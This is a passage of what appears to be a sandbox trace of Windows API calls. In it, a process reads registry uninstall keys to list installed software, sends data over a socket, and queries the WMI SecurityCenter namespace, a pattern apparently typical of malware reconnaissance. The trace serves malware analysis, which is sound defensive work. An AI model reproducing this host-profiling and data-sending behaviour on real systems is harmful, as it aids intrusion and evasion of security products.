lpcbData=0x38f0e0*=0x1e | out: lpType=0x38f0e4*=0x1, lpData="16.0.4266.1003", lpcbData=0x38f0e0*=0x1e) returned 0x0 [0234.657] RegCloseKey (hKey=0x608) returned 0x0 [0234.657] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.657] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x68) returned 0x0 [0234.657] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2663e90, lpcbData=0x38f0e0*=0x68 | out: lpType=0x38f0e4*=0x1, lpData="Update for Microsoft .NET Framework 4.8 (KB4503575)", lpcbData=0x38f0e0*=0x68) returned 0x0 [0234.657] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x4) returned 0x0 [0234.657] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2663fcc, lpcbData=0x38f0e0*=0x4 | out: lpType=0x38f0e4*=0x1, lpData="1", lpcbData=0x38f0e0*=0x4) returned 0x0 [0234.657] RegCloseKey (hKey=0x608) returned 0x0 [0234.658] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.658] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7e) returned 0x0 [0234.658] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26642f8, lpcbData=0x38f0e0*=0x7e | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x38f0e0*=0x7e) returned 0x0 [0234.658] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1e) returned 0x0 [0234.658] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2664464, lpcbData=0x38f0e0*=0x1e | out: lpType=0x38f0e4*=0x1, lpData="9.0.30729.6161", lpcbData=0x38f0e0*=0x1e) returned 0x0 [0234.659] RegCloseKey (hKey=0x608) returned 0x0 [0234.659] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.659] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7c) returned 0x0 [0234.659] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26647f8, lpcbData=0x38f0e0*=0x7c | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x38f0e0*=0x7c) returned 0x0 [0234.659] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.659] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x266495c, lpcbData=0x38f0e0*=0x16 | out: lpType=0x38f0e4*=0x1, lpData="11.0.61030", lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.659] RegCloseKey (hKey=0x608) returned 0x0 [0234.660] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.660] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x76) returned 0x0 [0234.660] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2664cd8, lpcbData=0x38f0e0*=0x76 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x38f0e0*=0x76) returned 0x0 [0234.660] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.660] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2664e34, lpcbData=0x38f0e0*=0x16 | out: lpType=0x38f0e4*=0x1, lpData="11.0.61030", lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.660] RegCloseKey (hKey=0x608) returned 0x0 [0234.660] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.661] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.661] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x26651b4, lpcbData=0x38f0e0*=0x7a | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.661] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.661] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2665318, lpcbData=0x38f0e0*=0x1a | out: lpType=0x38f0e4*=0x1, lpData="11.0.61030.0", lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.661] RegCloseKey (hKey=0x608) returned 0x0 [0234.661] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.661] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.661] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x266569c, lpcbData=0x38f0e0*=0x7a | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpcbData=0x38f0e0*=0x7a) returned 0x0 [0234.662] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.662] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2665800, lpcbData=0x38f0e0*=0x1a | out: lpType=0x38f0e4*=0x1, lpData="12.0.30501.0", lpcbData=0x38f0e0*=0x1a) returned 0x0 [0234.662] RegCloseKey (hKey=0x608) returned 0x0 [0234.662] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.662] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x78) returned 0x0 [0234.662] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2665b84, lpcbData=0x38f0e0*=0x78 | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x38f0e0*=0x78) returned 0x0 [0234.662] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.662] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2665ce0, lpcbData=0x38f0e0*=0x16 | out: lpType=0x38f0e4*=0x1, lpData="10.0.40219", lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.662] RegCloseKey (hKey=0x608) returned 0x0 [0234.663] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.663] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.663] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.663] RegCloseKey (hKey=0x608) returned 0x0 [0234.663] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.663] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.663] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.664] RegCloseKey (hKey=0x608) returned 0x0 [0234.664] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.664] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.664] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.664] RegCloseKey (hKey=0x608) returned 0x0 [0234.664] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.664] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.665] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.665] RegCloseKey (hKey=0x608) returned 0x0 [0234.665] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.665] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.665] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.665] RegCloseKey (hKey=0x608) returned 0x0 [0234.665] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.666] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.666] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.666] RegCloseKey (hKey=0x608) returned 0x0 [0234.666] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.666] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.666] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x0, lpData=0x0, lpcbData=0x38f0e0*=0x0) returned 0x2 [0234.666] RegCloseKey (hKey=0x608) returned 0x0 [0234.667] RegOpenKeyExW (in: hKey=0x610, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f0c4 | out: phkResult=0x38f0c4*=0x608) returned 0x0 [0234.667] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x7c) returned 0x0 [0234.667] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayName", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2666d94, lpcbData=0x38f0e0*=0x7c | out: lpType=0x38f0e4*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x38f0e0*=0x7c) returned 0x0 [0234.667] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x0, lpcbData=0x38f0e0*=0x0 | out: lpType=0x38f0e4*=0x1, lpData=0x0, lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.667] RegQueryValueExW (in: hKey=0x608, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x38f0e4, lpData=0x2666ef8, lpcbData=0x38f0e0*=0x16 | out: lpType=0x38f0e4*=0x1, lpData="12.0.21005", lpcbData=0x38f0e0*=0x16) returned 0x0 [0234.667] RegCloseKey (hKey=0x608) returned 0x0 [0234.668] RegCloseKey (hKey=0x610) returned 0x0 [0234.677] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0xef56a17f, Data2=0xa68b, Data3=0x411b, Data4=([0]=0xa3, [1]=0x7f, [2]=0x24, [3]=0xcf, [4]=0xc2, [5]=0xf5, [6]=0x3c, [7]=0x9b))) returned 0x0 [0234.677] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x2052a8d6, Data2=0x8256, Data3=0x4a15, Data4=([0]=0xa0, [1]=0x19, [2]=0x2e, [3]=0xa7, [4]=0xbe, [5]=0x6, [6]=0x44, [7]=0x87))) returned 0x0 [0234.678] send (s=0x268, buf=0x3bf9f9f*, len=1530, flags=0) returned 1530 [0234.679] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0234.802] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0x2a01dffb, Data2=0x4ebf, Data3=0x476f, Data4=([0]=0xbe, [1]=0xd5, [2]=0xd8, [3]=0xd6, [4]=0x37, [5]=0x60, [6]=0x5f, [7]=0xc9))) returned 0x0 [0234.802] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x56a42835, Data2=0xa7e2, Data3=0x4954, Data4=([0]=0xac, [1]=0x20, [2]=0xa0, [3]=0x33, [4]=0x1f, [5]=0xe6, [6]=0x59, [7]=0xf))) returned 0x0 [0234.803] send (s=0x268, buf=0x2668257*, len=171, flags=0) returned 171 [0234.803] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0234.858] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f088 | out: ppv=0x38f088*=0x6d0cac) returned 0x0 [0234.858] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f080 | out: pAptType=0x38f080*=1) returned 0x0 [0234.858] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f084 | out: ppvObject=0x38f084*=0x0) returned 0x80004002 [0234.858] IUnknown:Release (This=0x6d0cac) returned 0x1 [0234.859] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9f0 | out: ppv=0x38e9f0*=0x5642880) returned 0x0 [0234.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642880, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec08 | out: ppvObject=0x38ec08*=0x0) returned 0x80004002 [0234.860] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642880, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec14 | out: ppvObject=0x38ec14*=0x5644378) returned 0x0 [0234.860] WbemDefPath:IUnknown:Release (This=0x5642880) returned 0x0 [0234.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e834 | out: ppvObject=0x38e834*=0x5644378) returned 0x0 [0234.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7e8 | out: ppvObject=0x38e7e8*=0x0) returned 0x80004002 [0234.860] WbemDefPath:IUnknown:AddRef (This=0x5644378) returned 0x3 [0234.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e144 | out: ppvObject=0x38e144*=0x0) returned 0x80004002 [0234.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0234.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e100 | out: ppvObject=0x38e100*=0x56427b0) returned 0x0 [0234.861] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56427b0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e108 | out: pCid=0x38e108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0234.861] WbemDefPath:IUnknown:Release (This=0x56427b0) returned 0x3 [0234.861] CoGetContextToken (in: pToken=0x38e160 | out: pToken=0x38e160) returned 0x0 [0234.861] CoGetContextToken (in: pToken=0x38e574 | out: pToken=0x38e574) returned 0x0 [0234.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5f4 | out: ppvObject=0x38e5f4*=0x0) returned 0x80004002 [0234.861] WbemDefPath:IUnknown:Release (This=0x5644378) returned 0x2 [0234.861] WbemDefPath:IUnknown:Release (This=0x5644378) returned 0x1 [0234.861] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0234.861] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0234.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x5644378, riid=0x38ef3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef38 | out: ppvObject=0x38ef38*=0x5644378) returned 0x0 [0234.861] WbemDefPath:IUnknown:AddRef (This=0x5644378) returned 0x3 [0234.861] WbemDefPath:IUnknown:Release (This=0x5644378) returned 0x2 [0234.861] WbemDefPath:IWbemPath:SetText (This=0x5644378, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0234.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644378, puCount=0x38f0b0 | out: puCount=0x38f0b0*=0x2) returned 0x0 [0234.861] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=4, puBuffLength=0x38f0ac*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ac*=0x18, pszText=0x0) returned 0x0 [0234.861] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=4, puBuffLength=0x38f0ac*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f0ac*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0234.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644378, puCount=0x38f09c | out: puCount=0x38f09c*=0x2) returned 0x0 [0234.861] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=4, puBuffLength=0x38f098*=0x0, pszText=0x0 | out: puBuffLength=0x38f098*=0x18, pszText=0x0) returned 0x0 [0234.861] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=4, puBuffLength=0x38f098*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f098*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0234.861] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f02c | out: ppv=0x38f02c*=0x6d0cac) returned 0x0 [0234.861] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f024 | out: pAptType=0x38f024*=1) returned 0x0 [0234.861] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f028 | out: ppvObject=0x38f028*=0x0) returned 0x80004002 [0234.861] IUnknown:Release (This=0x6d0cac) returned 0x1 [0234.862] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec48 | out: ppv=0x38ec48*=0x563a8d8) returned 0x0 [0234.862] WbemLocator:IUnknown:QueryInterface (in: This=0x563a8d8, riid=0x7261dd3c*(Data1=0xb196b28f, 